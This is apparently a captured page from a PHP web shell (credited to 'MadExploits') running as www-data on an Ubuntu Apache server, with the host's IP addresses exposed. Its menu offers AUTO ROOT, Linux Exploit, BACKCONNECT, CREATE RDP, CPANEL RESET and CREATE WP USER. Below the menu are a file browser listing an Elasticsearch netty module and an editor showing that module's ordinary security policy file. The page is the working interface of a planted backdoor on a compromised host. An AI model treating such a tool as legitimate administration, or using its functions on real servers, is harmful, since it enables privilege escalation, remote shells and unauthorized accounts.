Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.114.233
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
elasticsearch /
modules /
transport-netty4 /
[ HOME SHELL ]
Name
Size
Permission
Action
netty-buffer-4.1.66.Final.jar
294.67
KB
-rw-r--r--
netty-codec-4.1.66.Final.jar
327.58
KB
-rw-r--r--
netty-codec-http-4.1.66.Final....
619.27
KB
-rw-r--r--
netty-common-4.1.66.Final.jar
636
KB
-rw-r--r--
netty-handler-4.1.66.Final.jar
512.16
KB
-rw-r--r--
netty-resolver-4.1.66.Final.ja...
36.14
KB
-rw-r--r--
netty-transport-4.1.66.Final.j...
467.17
KB
-rw-r--r--
plugin-descriptor.properties
1.65
KB
-rw-r--r--
plugin-security.policy
1.13
KB
-rw-r--r--
transport-netty4-client-7.15.1...
81.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugin-security.policy
/* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License * 2.0 and the Server Side Public License, v 1; you may not use this file except * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ grant codeBase "${codebase.netty-common}" { // for reading the system-wide configuration for the backlog of established sockets permission java.io.FilePermission "/proc/sys/net/core/somaxconn", "read"; // netty makes and accepts socket connections permission java.net.SocketPermission "*", "accept,connect"; // Netty sets custom classloader for some of its internal threads permission java.lang.RuntimePermission "setContextClassLoader"; }; grant codeBase "${codebase.netty-transport}" { // Netty NioEventLoop wants to change this, because of https://bugs.openjdk.java.net/browse/JDK-6427854 // the bug says it only happened rarely, and that its fixed, but apparently it still happens rarely! permission java.util.PropertyPermission "sun.nio.ch.bugLevel", "write"; };
Close